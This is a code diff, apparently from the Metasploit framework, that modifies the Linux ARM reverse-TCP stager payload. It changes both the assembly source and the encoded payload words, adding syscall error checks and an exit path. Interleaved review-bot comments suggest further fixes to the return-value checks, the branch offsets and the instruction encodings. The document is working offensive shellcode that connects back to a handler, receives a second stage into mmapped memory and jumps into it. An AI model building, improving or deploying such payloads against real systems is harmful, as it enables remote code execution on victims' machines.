diff --git a/external/source/shellcode/linux/armle/stager_sock_reverse.s b/external/source/shellcode/linux/armle/stager_sock_reverse.s
index ed4e63c11c..d066a7a48c 100644
--- a/external/source/shellcode/linux/armle/stager_sock_reverse.s
+++ b/external/source/shellcode/linux/armle/stager_sock_reverse.s
@@ -34,12 +34,16 @@ _start:
 mov r1,#1 @ type = SOCK_STREAM
 mov r2,#6 @ protocol = IPPROTO_TCP
 swi 0
+ cmp r0, #0
+ blt failed
 @ int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
 mov r12,r0 @ sockfd
 add r7,#2 @ __NR_socket
- add r1,pc,#144 @ *addr
+ add r1,pc,#196 @ *addr
 mov r2,#16 @ addrlen
 swi 0
+ cmp r0, #0
+ blt failed
 @ ssize_t recv(int sockfd, void *buf, size_t len, int flags);
 mov r0,r12 @ sockfd
 sub sp,#4
@@ -48,6 +52,8 @@ _start:
 mov r2,#4 @ len
 mov r3,#0 @ flags
 swi 0
+ cmp r0, #0
+ blt failed
 @ round length
 ldr r1,[sp,#0]
 ldr r3,=0xfffff000
@@ -63,6 +69,8 @@ _start:
 mov r4,r0 @ fd
 mov r5,#0 @ pgoffset
 swi 0
+ cmn r0, #1
+ beq failed
 @ recv loop
 @ ssize_t recv(int sockfd, void *buf, size_t len, int flags);
 add r7,#99 @ __NR_recv
@@ -78,12 +86,20 @@ loop:
 ble last
 mov r2,#1000 @ len
 swi 0
+ cmp r0, #0
+ blt failed
 b loop
 last:
 add r2,#1000 @ len
 swi 0
+ cmp r0, #0
+ blt failed
 @ branch to code
 mov pc,r1
+failed:
+ mov r7, #1
+ mov r0, #1
+ swi 0
 @ addr
 @ port: 4444 , sin_fam = 2
 .word 0x5c110002
diff --git a/modules/payloads/stagers/linux/armle/reverse_tcp.rb b/modules/payloads/stagers/linux/armle/reverse_tcp.rb
index 68788d086b..efd8262dcf 100644
--- a/modules/payloads/stagers/linux/armle/reverse_tcp.rb
+++ b/modules/payloads/stagers/linux/armle/reverse_tcp.rb
@@ -39,6 +39,7 @@ module MetasploitModule
 },
 'Payload' => [
+ # Generated from external/source/shellcode/linux/armle/stager_sock_reverse.s
 0xe59f70f0, # ldr r7, [pc, #240] ; set 281(0x119) to r7
 0xe3a00002, # mov r0, #2
 0xe3a01001, # mov r1, #1
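Review bot: The context line `add r7,#2 @ __NR_socket` in this hunk now selects syscall 283, which is the connect() the line above it announces, so the comment is wrong and should read `add r7,#2 @ __NR_connect`. The new `add r1,pc,#196 @ *addr` offset appears correct for the thirteen instructions this commit inserts between it and the sockaddr words (13 × 4 = 52, and 144 + 52 = 196), but it has to be recomputed by hand every time an instruction is added or removed. Labelling the `.word 0x5c110002` line (say `sockaddr:`) and writing `adr r1, sockaddr` lets the assembler emit the same `add r1,pc,#imm` encoding without the magic number. The `_start` body starts before and continues after this hunk.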
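Review bot: `cmp r0, #0` / `blt failed` after the 4-byte length recv() lets a return of 0 through: if the handler closes the connection at this point, nothing has been written into the slot reserved by `sub sp,#4`, and the stager goes on to `ldr r1,[sp,#0]` and mmaps whatever the stack happened to hold. A short read of 1–3 bytes passes the same check and yields a partially overwritten length word. Requiring the whole word, `cmp r0, #4` / `bne failed`, rejects both cases. The `_start` body continues outside the hunk.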
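Review bot: `cmn r0, #1` / `beq failed` after mmap2 fires only when r0 is exactly -1 (-EPERM); a raw ARM Linux syscall reports failure as -errno in r0, so the usual mmap2 failures (-ENOMEM = -12, -EINVAL = -22) are accepted as a valid buffer and handed to recv(). The test libc syscall stubs use covers the whole -4095..-1 error range: `cmn r0, #4096` / `bcs failed` (a carry out of r0 + 4096 means r0 is in that range), and it still avoids the signed-compare problem for mappings at or above 0x80000000 that presumably motivated dropping the old `blt`. The mmap2 argument setup begins before this hunk.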
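Review bot: Both new `cmp r0, #0` / `blt failed` checks in the receive loop accept r0 == 0, so a peer that closes the connection mid-transfer passes every iteration and `mov pc,r1` jumps into a buffer that was only partly filled; `ble failed` after each recv() rejects the orderly shutdown as well. From the `mov r2,#1000 @ len` and `add r2,#1000 @ len` visible here the loop also appears to assume each recv() returns the full requested length rather than the count in r0, though the loop head that maintains the remaining count is before the hunk, so I may be missing an adjustment there. A short comment above the new label, `@ failed: exit(1); the handler sees the connection drop`, would document the only error path the stager has.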
@@ -75,8 +76,8 @@ module MetasploitModule
 0xe1a04000, # mov r4, r0
 0xe3a05000, # mov r5, #0
 0xef000000, # svc 0x00000000 ; invoke mmap2
- 0xe3500000, # cmp r0, #0
- 0xba000012, # blt 817c
+ 0xe3700001, # cmn r0, #1
+ 0x0a000012, # beq
 0xe2877063, # add r7, r7, #99 ; set 291(0x123) to r7
 0xe1a01000, # mov r1, r0
 0xe1a0000c, # mov r0, ip
@@ -86,17 +87,17 @@ module MetasploitModule
 0xe2422ffa, # sub r2, r2, #1000
 0xe58d2000, # str r2, [sp]
 0xe3520000, # cmp r2, #0
- 0xda000002, # ble 80fc
+ 0xda000004, # ble 80fc
 0xe3a02ffa, # mov r2, #1000
 0xef000000, # svc 0x00000000 ; invoke recv
 0xe3500000, # cmp r0, #0
 0xba000005, # blt 817c
- 0xeafffff7, # b 80dc
+ 0xeafffff5, # b 80dc
 # last:
 0xe2822ffa, # add r2, r2, #1000
 0xef000000, # svc 0x00000000 ; invoke recv
- 0xe3500000, # cmp r0, #0
- 0xba000000, # blt 817c
+ 0xe3500000, # cmp r0, #0
+ 0xba000000, # blt 817c
 0xe1a0f001, # mov pc, r1
 # failed:
 0xe3a07001, # mov r7, #1
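Review bot: `0xe3700001, # cmn r0, #1` / `0x0a000012, # beq` only catches r0 == -1 (-EPERM), while the kernel returns any -errno for a failed mmap2, so -ENOMEM or -EINVAL is taken as a valid buffer and used as the recv() destination. The libc-style test for the -4095..-1 error range is `0xe3700a01, # cmn r0, #4096` / `0x2a000012, # bcs failed` (0x1000 encodes as rotate 0xA with imm8 0x01; bcs is condition 0b0010 in the top nibble). The `beq` comment should also name its target as the replaced `blt 817c` did, and since the earlier hunk declares the array generated from the .s, regenerating it from the assembled source would be safer than hand-encoding these words. The Payload array continues outside the hunk.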
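Review bot: The disassembly comments on the re-encoded branches keep absolute addresses from a previous build (`ble 80fc`, `b 80dc`, `blt 817c`) that no longer describe the new offsets, and the final `0xe3500000` / `0xba000000` pair is removed and re-added unchanged except for whitespace. With the offsets now patched by hand, symbolic targets such as `0xda000004, # ble last` and `0xeafffff5, # b loop` keep the listing honest; I could confirm the ble target lands on `add r2, r2, #1000` but not the -11 word offset of `b loop`, because the loop head is outside the hunk. The two `blt 817c` checks after recv also let a zero-length return (peer closed) reach `mov pc, r1`; `0xda000005, # ble failed` and `0xda000000, # ble failed` would reject it.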